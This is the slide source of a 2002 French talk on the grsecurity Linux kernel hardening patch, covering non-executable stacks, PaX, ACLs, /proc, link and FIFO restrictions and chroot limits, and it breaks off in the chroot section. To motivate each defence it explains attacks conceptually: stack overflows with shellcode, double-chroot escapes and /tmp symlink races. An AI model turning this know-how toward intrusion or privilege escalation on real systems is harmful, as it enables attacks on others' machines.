%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %% THE MIDGARD MAGICPOINT TEMPLATE %% %% Copyright(c) 1999 Henri Bergius %% %% A template for making MagicPoint presentations for %% Midgard. Originally written for MagicPoint 1.06a %% and the Midgard Workshop in October 1999. %% %% See the Midgard CVS repository for usage examples. %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %deffont "standard" tfont "arial.ttf", xfont "helvetica-medium-r" %deffont "thick" tfont "arialbd.ttf", xfont "helvetica-bold-r" %deffont "typewriter" tfont "courbd.ttf", xfont "courier-medium-r" %deffont "code" tfont "courdb.ttf", size 3, fore "green", prefix " " %% %% Default settings per each line numbers. %% %% The page settings: %%default 1 leftfill, size 2, fore "white", back "black", font "thick" %%, bimage "midgard-black-bg.jpg" 1024x768 %%default 1 area 90 90, leftfill, size 2, fore "white", back "black", font "thick", hgap 0 %%Chmurf... c'est bien joli area 90 90, mais bon là je m'en vais te le virer : et hop %%default 1 leftfill, size 2, fore "white", back "black", font "thick", hgap 0 %default 1 leftfill, size 2, fore "white", back "black", font "thick" %% %% Format the header: %default 2 size 7, vgap 10, prefix " " %% %% Have a bar: %default 3 size 2, bar "brown" 5, vgap 30, right, prefix "(c)01/2002 Denis Ducamp pour RESIST" %%, right, image "copy.png" %% %% The standard text settings: %%default 4 left, size 5, fore "white", vgap 40, prefix " ", font "standard" %%grrr... Ne pas utiliser left, mais leftfill... sinon pas d'indentation correcte :( %default 4 leftfill, size 5, fore "white", vgap 40, prefix " ", font "standard" %% %% Default settings that are applied to TAB-indented lines. %% %tab 1 size 4, vgap 30, prefix " ", icon box "brown" 30, fore "white" %tab 2 size 4, vgap 20, prefix " ", icon arc "yellow" 30, fore "grey75" %%tab 2 size 4, vgap 20, prefix " ", icon arc "yellow" 30 %tab 3 size 3, vgap 20, prefix " ", icon delta3 "white" 40, fore "grey75" %tab 4 size 3, vgap 20, prefix " ", icon delta3 "white" 40, fore "grey75" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page %nodefault %center, fore "white", size 8 Durcissement du noyau Linux %size 4 %center, size 7 l'utile et le futile dans le patch grsecurity %size 4 %size 7 RÉSIST %size 3 28 janvier 2002 %size 4 %right, size 4, fore "white" par Denis Ducamp - HSC Toulouse Denis.Ducamp@hsc.fr - http://www.hsc.fr/ Denis.Ducamp@groar.org - http://www.groar.org/ %left %%image "linux-logo.png" %%xsystem "display -geometry %327x360 linux-logo.png" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page HSC - Hervé Schauer Consultants cabinet de 16 consultants en sécurité Unix Réseaux TCP/IP Windows NT/2k/... agence de 2 consultants sur Toulouse depuis novembre 2001 Intervient dans de nombreuses conférences OSSIR Paris : SUR et SWNT et maintenant RÉSIST à Toulouse %cont, fore "green" ;-) %fore "white" EFE / Linux Expo / Reed-OIP / Netsec / Infosec / etc. Toutes nos présentations sont accessibles sur notre serveur web ainsi que de nombreux articles dans la rubrique tips, des rapports de veille, des articles, des supports de cours, etc. Logiciels libres depuis toujours 386BSD, Linux, FreeBSD, OpenBSD sendmail, bind, Postfix, apache, OpenSSL, OpenSSH, etc. auteur de quelques logiciels libres originaux en sécurité filterrules, nstreams, idswu, babelweb, subweb, etc. Mais maîtrise aussi de nombreux logiciels et matériels commerciaux %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page HSC - prestations Audits de sécurité Tests d'intrusion Audits de sources Veille en vulnérabilités Veille technologique et stratégique de l'actualité en sécurité Cours Risques TCP/IP Linux / Unix / Windows Postfix, bind, etc. IPSec Internet/Intranet etc. Conseils en architectures etc. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Introduction %rcutin Le patch grsecurity %pause et les autres : OpenWall, Pax, etc. %rcutin, pause Quelques notions %pause chroot / set[ug]id débordement de tampons /proc / noms de fichiers temporaires prévisibles / fork-bomb Journalisation / audit ptrace() / OS-fingerprint / tpe %rcutin, pause Les options de grsecurity %pause Buffer Overflow Protection Access Control Lists Filesystem Protections Kernel Auditing Executable Protections Network Protections Sysctl support Miscellaneous Enhancements %rcutin, pause Quelques cas concrets %pause Le serveur d'un particulier / de e-commerce / de la NSA %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Le patch grsecurity Le patch grsecurity regroupe un grand nombre d'options de durcissement du noyau linux. Le durcissement noyau est l'interdiction d'appeler certains appels systèmes dans un certain nombre de cas d'accéder à certaines données sensibles Cette présentation fait le tour de chacune des options en expliquant contre quelles attaques respectives elles sont écrites pour lutter et si réellement elles sont utiles. Home Page : http://www.grsecurity.net/ Version testée : Jan 21 01:34 grsecurity-1.9.3a-2.4.17.patch %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Les autres patches Ce patch est basé sur de nombreux autres patches dont : Openwall http://www.openwall.com/linux/ par Solar Designer disponible pour 2.2.19/20 et 2.0.39 fait partie du projet Openwall, voir aussi Owl PaX http://pageexec.virtualave.net/ par The PaX Team disponible pour 2.2.19/20 et 2.4.16 Bien d'autres qui ont été portés sous Linux 2.4 ex : Trusted Path Execution, cf Phrack %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Pourquoi ce patch ? Pourquoi existe-t'il ? pour permettre à des administrateurs d'ajouter un grand nombre d'options de façon simple toutes les options sont contenues dans un seul patch ce patch est mis à jour à chaque nouvelle version de noyau pour permettre d'avoir sous Linux 2.4 des patches écrits pour Linux 2.0/2.2 Pourquoi est-il étudié ici ? parce que c'est le patch qui regroupe le plus grand nombre d'options c'est l'occasion de voir ce qui est utile... Attention : cet ensemble de patches est complexe certains patches peuvent être en cours de développement donc bugs : du dénis de services... aux contournements de protections. certains patches peuvent être supprimés d'une version à l'autre ex : "stealth networking" est remplaçable par iptables %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Quelques notions chroot / set[ug]id débordement de tampons /proc / noms de fichiers temporaires prévisibles / fork-bomb Journalisation / audit ptrace() / OS-fingerprint / tpe %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Quelques notions (1) chroot L'appel système chroot permet de limiter un processus à une sous-arborescence du disque et de limiter les risques si l'application est vulnérable + L'accès disque du pirate est limité à cette arborescence - La mise en cage d'un processus tournant sous root est inutile création de périphériques : accès direct au disque double chroot : évasion de la cage etc. set[ug]id L'appel système setuid (setgid) change l'utilisateur (le groupe principal) exécutant le processus + Seul un processus (setuid) root peut changer d'identité - Ce processus peut dans certains cas récupérer les droits root Un programme setuid (setgid) s'exécute avec les privilèges de l'utilisateur (du groupe) propriétaire si un tel programme est vulnérable alors tout utilisateur peut obtenir les privilèges du propriétaire %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Quelques notions (2) débordement de tampons Le programmeur a prévu un tampon de longueur fixe pour une donnée l'utilisateur envoie une donnée de longueur bien plus grande l'exécution du programme est perturbée du déni de service... %font "code" Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () %font "standard" à l'exécution contrôlée de code %font "code" Linux vaio 2.4.16 #3 Sat Dec 1 23:56:11 CET 2001 i686 unknown uid=0(root) gid=0(root) groups=0(root) %font "standard" l'exploitation du débordement de tampon se fait par envoie d'un shellcode (code exécutable lançant un shell) et changement de l'adresse de retour d'une fonction en cours vers le shellcode envoyé changement de l'adresse de retour vers une fonction de la bibliothèque libc system(), strcpy(), etc. le tampon débordé peut aussi bien être placé dans la pile, le tas, etc. càd des espaces mémoire en exécution qui ne devraient être qu'en lecture / écriture %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Quelques notions (3) /proc système de fichiers virtuels sous Linux donne accès à des paramêtres du noyau dont certains peuvent être modifiés au vol : /proc/sys + permet d'obtenir de nombreuses informations sur tous les processus - permet de savoir ce que font les autres utilisateurs Noms de fichiers temporaires prévisibles l'attaquant crée le fichier avant l'utilisateur et lui permet d'y écrire dedans le fichier créé peut être un lien symbolique/dur ou un tube nommé - déni de service : écrasement de fichiers systèmes escalade de privilèges : écrasement contrôlé de fichiers sensibles vol d'informations sensibles fork-bomb exécution d'un grand nombre de processus exécution d'un grand nombre de processus par seconde - déni de service par consommation de ressources système : mémoire et/ou processeur %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Quelques notions (4) Journalisation une application (le noyau) génère un évènement l'évènement est trié et enregistré par un démon spécialisé : syslogd sous Linux c'est le démon klogd qui route les évènements noyau vers syslogd la journalisation peut être déportée vers un autre serveur utile car les pirates nettoient systématiquement leurs traces sur le système intrusé Audit le noyau journalise tous les appels à certains appels systèmes avec les paramêtres et/ou le résultat + analyse de l'utilisation du système en temps réel en différé - peut être très consommateur en ressources déni de service par consommation de ressources système %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Quelques notions (5) ptrace() Cet appel système permet d'effectuer du debogage de processus sous Unix + pour savoir comment fonctionne un processus - pour changer l'exécution d'un processus en cours d'exécution OS-fingerprinting Un ensemble de paquets IP non standards sont envoyés au système à analyser L'ensemble des réponses est caractéristique de chaque type de système deux versions différentes d'un même système peuvent souvent être différenciés Trusted path execution (tpe) Permet de limiter l'exécution aux programmes se trouvant dans un répertoire de confiance répertoire appartenant à root et n'étant en écriture que pour root %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Grsecurity %font "code" CONFIG_GRKERNSEC %font "standard" Permet tout simplement d'activer la sélection des groupes d'options principaux Buffer Overflow Protection Access Control Lists Filesystem Protections Kernel Auditing Executable Protections Network Protections Sysctl support Miscellaneous Enhancements %%%font "code" %% If you say Y here, you will be able to configure many features that %% will enhance the security of your system. It is highly recommended %% that you say Y here and read through the help for each option so %% you fully understand what its doing and can evaluate its usefulness %% for your machine. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Groupe d'options 1/8 %cont, fore "green" Buffer Overflow Protection Access Control Lists Filesystem Protections Kernel Auditing Executable Protections Network Protections Sysctl support Miscellaneous Enhancements %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page OpenWall Non-executable Stack %font "code" CONFIG_GRKERNSEC_STACK %font "standard" Permet de rendre la pile d'exécution non exécutable Il s'agit du patch de Solar Designer porté sous Linux 2.4 Protège contre l'exécution de code dans la pile Utilisée lors d'exploitations de vulnérabilités : débordements de tampons dans la pile / chaînes de formats Ne protège pas dans le cas : de débordements de tampons dans le tas de retours dans la libc L'exécution de code dans la pile est utilisée dans la grande majorité des exploitations de vulnérabilités car c'est le cas d'école donc cette option est très utile, %cont, fore "red" mais %cont, fore "grey75" : elle ne dispense pas de mettre à jour ses services vulnérables elle permet généralement de se prémunir contre le tout premier programme d'exploitation de chaque vulnérabilité Ne peut être sélectionné si "PaX protection" l'est %%%font "code" %% If you say Y here, your system will not allow execution of %% code on the stack, making buffer overflow exploitation more difficult. %% The code for this protection is taken from the Openwall patch for %% linux 2.2 by Solar Designer. You can view his projects at %% http://www.openwall.com/linux. %% Exploits against your machine with this protection will have to dabble %% in more obscure methods of exploitation(bss,got,heap..) %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Gcc trampoline support %font "code" CONFIG_GRKERNSEC_STACK_GCC %font "standard" Permet d'activer le support des sauts par trampolines Un saut par trampoline est l'exécution d'un morceau de code dans la pile pour accélérer un programme Le patch doit différencier les sauts des exploitations de vulnérabilités La bibliothèque glibc 2.0 contient plusieurs sauts et nécessite donc cette option En théorie ceci pourrait permettre de contourner le fait que la pile est non exécutable En pratique aucun cas n'a été détecté. Nécessite "OpenWall Non-executable Stack" %cont, font "code" CONFIG_GRKERNSEC_STACK %font "standard" %%%font "code" %% If you say Y here, the system will support trampoline code along %% with the stack protection. If you do not have any programs on %% your system that require this (glibc 2.0 users must say YES to %% this option) you may say no here. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page PaX protection %font "code" CONFIG_GRKERNSEC_PAX %font "standard" Empêche l'exécution de code dans certaines pages mémoire Normalement sous IA-32 toute page en lecture est en exécution Il s'agit du patch PaX Protège contre l'exécution de code dans la pile, le tas... Utilisée lors d'exploitations de vulnérabilités Incompatible avec certains programmes ceux qui exécutent du code dans des espaces mémoires dynamiques obtenus par malloc() : XFree86, JRE, Wine... PaX est aujourd'hui contournable voir l'article de Nergal : article 4 phrack 58 mais permet généralement de se prémunir contre le tout premier programme d'exploitation de chaque vulnérabilité Ne peut être sélectionné si "OpenWall Non-executable Stack" l'est %%%font "code" %% By design the IA-32 architecture does not allow for protecting %% memory pages against execution, i.e. if a page is readable (such %% as the stack or heap) it is also executable. There is a well %% known exploit technique that makes use of this fact and a common %% programming mistake where an attacker can introduce executable %% code of his choice somewhere in the attacked program's memory %% (typically the stack or the heap) and then execute it. If the %% attacked program was running with different (typically higher) %% privileges than that of the attacker, then he can elevate his %% own privilege level (e.g. get a root shell, write to files for %% which he does not have write access to, etc). %% Since the implementation is software based, it comes with a %% performance impact, you should evaluate your system carefully %% before deciding to use this feature on production systems. %% Enabling this feature will enforce the non-executable flag on %% memory pages thereby making it harder to execute 'foreign' code %% in a program. This will also break programs that rely on the %% old behaviour and expect that dynamically allocated memory via %% the malloc() family of functions is executable (which it is not). %% Notable examples are the XFree86 4.x server, the java runtime %% and wine. %% NOTE: you can use the 'chpax' utility to enable/disable this %% feature on a per file basis. chpax is available at %% http://pageexec.virtualave.net %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Emulate trampolines %font "code" CONFIG_GRKERNSEC_PAX_EMUTRAMP %font "standard" Le patch PaX est lui aussi incompatible avec les sauts par trampolines cette option permet de les détecter pour en autoriser l'exécution Nécessite "PaX protection" %cont, font "code" CONFIG_GRKERNSEC_PAX %font "standard" %%%font "code" %% There are some programs and libraries that for one reason or %% another attempt to execute special small code snippets from %% non-executable memory pages. Most notable examples are the %% signal handler return code generated by the kernel itself and %% the GCC trampolines. %% If you enabled CONFIG_GRKERNSEC_PAX then such programs will no %% longer work under your kernel. As a remedy you can say Y here %% and use the 'chpax' utility to enable trampoline emulation for %% the affected programs yet still have the protection provided by %% CONFIG_GRKERNSEC_PAX. Alternatively you can say N here and use %% the 'chpax' utility to disable CONFIG_GRKERNSEC_PAX for the %% affected files. chpax is available at %% http://pageexec.virtualave.net %% NOTE: enabling this feature *may* open up a loophole in the %% protection provided by CONFIG_GRKERNSEC_PAX that an attacker %% could abuse. Therefore the best solution is to not have any %% files on your system that would require this option. This can %% be achieved by not using libc5 (which relies on the kernel %% signal handler return code) and not using or rewriting programs %% that make use of the nested function implementation of GCC. %% Skilled users can just fix GCC itself so that it implements %% nested function calls in a way that does not interfere with PaX. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Restrict mprotect() %font "code" CONFIG_GRKERNSEC_PAX_MPROTECT %font "standard" Empêche que le processus réactive le droit en exécution sur des pages non exécutables le droit en écriture sur des pages en lecture seule Nécessite "PaX protection" %cont, font "code" CONFIG_GRKERNSEC_PAX %font "standard" %%%font "code" %% Enabling this option will prevent programs from changing the %% executable status of memory pages that were not originally %% created as executable. The kernel will also prevent programs %% from making read-only executable pages writable again. %% You should say Y here to complete the protection provided by %% the enforcement of the PAGE_EXEC flag (CONFIG_GRKERNSEC_PAX). %% NOTE: you can use the 'chpax' utility to enable/disable this %% feature on a per file basis. chpax is available at %% http://pageexec.virtualave.net %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Randomize mmap() base %font "code" CONFIG_GRKERNSEC_PAX_RANDMMAP %font "standard" Rend aléatoire les adresses des programmes : la pile d'exécution les résultats de mmap donc l'adresse de chargement des bibliothèques l'adresse des programmes ELF dynamiques L'attaquant doit deviner les adresses des composants à utiliser N'empèchée certainement pas : l'exploitatation de chaînes de formats par analyse distante de la pile d'exécution Ne peut être sélectionné si "OpenWall Non-executable Stack" l'est %%%font "code" %% By saying Y here the kernel will somewhat randomize the address %% space layout of programs at each execution (the top of the stack, the %% base address for mmap() requests that do not specify one themselves %% and the base address of dynamic ELF executables). %% As a result all dynamically loaded libraries will appear at random %% addresses and therefore be harder to exploit by a technique where %% an attacker attempts to execute library code for his purposes %% (e.g. spawn a shell from an exploited program that is running at %% an elevated privilege level). %% Furthermore, if a program is relinked as a dynamic ELF file, its %% base address layout will be randomized as well, completing the full %% randomization of the address space. Attacking such programs becomes %% a guess game. %% It is strongly recommended to say Y here even if CONFIG_GRKERNSEC_PAX %% is not enabled as address space layout randomization has negligible %% impact on performance yet it provides a very effective protection. %% NOTE: you can use the 'chpax' utility to enable/disable this %% feature on a per file basis. chpax is available at %% http://pageexec.virtualave.net %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Read-only kernel memory %font "code" CONFIG_GRKERNSEC_KMEM %font "standard" Empêche root de modifier la mémoire du noyau Empêche le chargement de root kits noyau Ne sert à rien si le support des modules n'est pas désactivé %%%font "code" %% If you say Y here, root will not be able to modify the contents of %% kernel memory. If module support is removed in addition to enabling %% this option, the ability of an attacker to insert foreign code into %% a running kernel is removed. If the sysctl option is enabled, a %% sysctl option with name "read_only_kmem" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Fixed mmap restrictions %font "code" CONFIG_GRKERNSEC_MMAPFIXED %font "standard" Empêche qu'un processus appelle la fonction mmap() avec une adresse fixe et un droit en exécution Permet d'empécher un programme de rendre inutile les résultats aléatoires de mmap() %%%font "code" %% If you say Y here, it will be impossible for an attacker to bypass the %% PaX buffer overflow protection by mmaping an executable memory region %% with a specific address set. If the sysctl option is enabled, a %% sysctl option with name "mmap_fixed_restrict" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Groupe d'options 2/8 %cont, fore "grey80" Buffer Overflow Protection %cont, fore "green" Access Control Lists Filesystem Protections Kernel Auditing Executable Protections Network Protections Sysctl support Miscellaneous Enhancements %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Oblivion ACL System %font "code" CONFIG_GRKERNSEC_ACL %font "standard" Permet d'activer le support du système des ACL Oblivion Ce système est basé sur le démon obvadm à récupérer séparément http://www.grsecurity.net/obvadm-1.1a.tar.gz Permet de spécifier des ACL de façon absolue sur tous les fichiers : file.acl de façon relative à certains programmes : proc.acl http://www.grsecurity.net/obvdoc.tar.gz Un fichier / une arborescence peuvent être : en lecture en exécution en écriture en ajout seulement caché %%%font "code" %% If you say Y here, you enable the Access Control List system for %% grsecurity called Oblivion. Oblivion is a very advanced ACL system %% that is optimized for speed and correctness of ACLS. Unlike many %% other popular ACL systems, it allows both process and file ACLs. %% To use the ACL system, you must also download the userspace code %% and documentation off the grsecurity website: http://grsecurity.net %% You will then need to run obvadm setup to set your password and create %% your config files. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Oblivion ACL System : options... Ces options ne sont pas documentées... et nécessitent "Enable grsecurity ACL system" %cont, font "code" CONFIG_GRKERNSEC_ACL %font "standard" Maximum Number of Rulesets for Files, Processes CONFIG_GR_MAX_RULESET 256 Seconds in between log messages(minimum) CONFIG_GR_FLOODTIME 3 Default ruleset for programs without acls Deny CONFIG_GR_DEF_DENY Allow CONFIG_GR_DEF_ALLOW (défaut) Deny_if_running_as_root CONFIG_GR_DEF_DENY_ROOT Enable ACL Debugging Messages CONFIG_GR_DEBUG Path to gradm CONFIG_GRADM_PATH "/sbin/gradm" Maximum tries before password lockout CONFIG_GR_MAXTRIES 3 Time to wait after max password tries, in seconds CONFIG_GR_TIMEOUT 30 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Groupe d'options 3/8 %cont, fore "grey60" Buffer Overflow Protection %cont, fore "grey80" Access Control Lists %cont, fore "green" Filesystem Protections Kernel Auditing Executable Protections Network Protections Sysctl support Miscellaneous Enhancements %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Proc Restrictions %font "code" CONFIG_GRKERNSEC_PROC %font "standard" Restreint l'accès à /proc aux utilisateurs qui ne peuvent consulter que leurs propres processus qui ne peuvent accéder ni à dmesg(8) ni aux symboles noyaux et modules Les restrictions effectives dépendent des options sélectionnées Permet de maintenir une bonne confidentialité sur des systèmes partagés par des personnes étrangères (FAI...) sur des systèmes très sensibles %%%font "code" %% If you say Y here, the permissions of the /proc filesystem %% will be altered to enhance system security and privacy. Depending %% upon the options you choose, you can either restrict users to see %% only the processes they themselves run, or choose a group that can %% view all processes and files normally restricted to root if you choose %% the "restrict to user only" option. NOTE: If you're running identd as %% a non-root user, you will have to run it as the group you specify here. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Restrict to user only %font "code" CONFIG_GRKERNSEC_PROC_USER %font "standard" Restreint l'accès à /proc à tous les utilisateurs non-root Nécessite "Proc restrictions" %cont, font "code" CONFIG_GRKERNSEC_PROC %font "standard" %%%font "code" %% If you say Y here, non-root users will only be able to view their own %% processes, and restricts them from viewing network-related information, %% running dmesg(8), and viewing kernel symbol and module information. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Allow special group %font "code" CONFIG_GRKERNSEC_PROC_USERGROUP %font "standard" Permet à un groupe d'accéder de façon normale à /proc Le groupe principal actuel du processus n'est plus consultable Nécessite "Proc restrictions" %cont, font "code" CONFIG_GRKERNSEC_PROC %font "standard" Ne peut être sélectionné si "Restrict to user only" l'est %%%font "code" %% If you say Y here, you will be able to select a group that will be %% able to view all processes, network-related information, and %% kernel and symbol information. This option is useful if you want %% to run identd as a non-root user. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page GID for special group %font "code" CONFIG_GRKERNSEC_PROC_GID 1001 %font "standard" Le groupe pour lequel l'accès à /proc n'est pas restreint Nécessite "Allow special group" %cont, font "code" CONFIG_GRKERNSEC_PROC_USERGROUP %font "standard" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Linking restrictions %font "code" CONFIG_GRKERNSEC_LINK %font "standard" Empêche un processus de suivre un lien symbolique dans un répertoire en +t (comme /tmp) qui appartient à un autre utilisateur non-root Permet de lutter de façon efficace contre les attaques utilisant des noms de fichiers temporaires prévisibles Ces attaques peuvent être de différents types des dénis de services destruction de fichiers systèmes sensibles par ex. /etc/shadow des escalades de privilèges modification contrôlée de fichiers systèmes sensibles par ex. /etc/passwd - /.rhosts %%%font "code" %% If you say Y here, /tmp race exploits will be prevented, since users %% will no longer be able to follow symlinks owned by other users in %% world-writeable +t directories (i.e. /tmp), unless the owner of the %% symlink is the owner of the directory. users will also not be %% able to hardlink to files they do not own. If the sysctl option is %% enabled, a sysctl option with name "linking_restrictions" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page FIFO restrictions %font "code" CONFIG_GRKERNSEC_FIFO %font "standard" Empêche un processus de suivre un lien symbolique dans un répertoire en +t (comme /tmp) qui appartient à un autre utilisateur non-root Permet de lutter de façon efficace contre les attaques utilisant des noms de fichiers temporaires prévisibles Ces attaques peuvent être de différents types des vols d'informations sensibles par ex. obtention d'informations après déchiffrement de modifications de données au vol par ex. insertion de backdoor dans main() %%%font "code" %% If you say Y here, users will not be able to write to FIFOs they don't %% own in world-writeable +t directories (i.e. /tmp), unless the owner of %% the FIFO is the same owner of the directory it's held in. If the sysctl %% option is enabled, a sysctl option with name "fifo_restrictions" is %% created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Secure file descriptors %font "code" CONFIG_GRKERNSEC_FD %font "standard" Assure que tout programme possède stdin, stdout et stderr ouverts respectivement les fichiers 0, 1 et 2 en C entrée et sortie standards, sortie d'erreurs Permet de lutter de façon efficace contre des dénis de service destruction de fichiers systèmes sensibles par ex. /etc/shadow des escalades de privilèges modification contrôlée de fichiers systèmes sensibles par ex. /etc/passwd - /.rhosts des vols d'informations sensibles par ex. /etc/shadow %%%font "code" %% If you say Y here, binaries will be protected from data spoofing %% attacks (eg. making a program read /etc/shadow). The patches do this %% by opening up /dev/null to any of the stdin, stdout, stderr file descriptors %% for binaries that are open. If the sysctl option is enabled, a sysctl %% option with name "secure_fds" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Chroot jail restrictions %font "code" CONFIG_GRKERNSEC_CHROOT %font "standard" Permet d'accéder à certaines options de restriction des programmes mis en cage Restricted signals Deny mounts Deny double-chroots Enforce chdir("/") on all chroots Deny (f)chmod +s Deny mknod Deny ptraces Restrict priority changes Empêche les processus restreints d'accéder à certaines fonctions normalement sans utilité pour eux sauf pour s'évader de la cage ou attaquer d'autres processus hors de la cage Normalement il est futile de restreindre des processus root Utile dans le cas d'applications mal conçues ou d'origine douteuse %%%font "code" %% If you say Y here, you will be able to choose several options that will %% make breaking out of a chrooted jail much more difficult. If you %% encounter no software incompatibilities with the following options, it %% is recommended that you enable each one. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Restricted signals %font "code" CONFIG_GRKERNSEC_CHROOT_SIG %font "standard" Les processus en cage ne peuvent envoyer des signaux qu'aux processus dans la même cage Permet d'empécher les attaques contre les programmes sensibles aux attaques par signaux en dénis de service en tuant (aléatoirement) les autres processus Nécessite "Chroot jail restrictions" %cont, font "code" CONFIG_GRKERNSEC_CHROOT %font "standard" %%%font "code" %% If you say Y here, processes inside a chroot will not be able to send %% signals outside of the chroot. The only signals allowed are null %% signals which perform no action, and the parent process sending %% a certain signal to its child. If the sysctl option is enabled, a %% sysctl option with name "chroot_restrict_sigs" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Deny mounts %font "code" CONFIG_GRKERNSEC_CHROOT_MOUNT %font "standard" Les processus en cage ne peuvent monter ou démonter des partitions Empêche l'évasion de la cage en montant des partitions inaccessibles depuis la cage Nécessite "Chroot jail restrictions" %cont, font "code" CONFIG_GRKERNSEC_CHROOT %font "standard" %%%font "code" %% If you say Y here, processes inside a chroot will not be able to %% mount or remount filesystems. If the sysctl option is enabled, a %% sysctl option with name "chroot_deny_mount" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Deny double-chroots %font "code" CONFIG_GRKERNSEC_CHROOT_DOUBLE %font "standard" Les processus en cage ne peuvent pas se mettre en cage eux même Empêche l'évasion de la cage par double chroot http://www.bpfh.net/simes/computing/chroot-break.html Nécessite "Chroot jail restrictions" %cont, font "code" CONFIG_GRKERNSEC_CHROOT %font "standard" %%%font "code" %% If you say Y here, processes inside a chroot will not be able to chroot %% again. This is a widely used method of breaking out of a chroot jail %% and should not be allowed. If the sysctl option is enabled, a sysctl %% option with name "chroot_deny_chroot" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Enforce chdir("/") on all chroots %font "code" CONFIG_GRKERNSEC_CHROOT_CHDIR %font "standard" La fonction chroot() force que le répertoire du 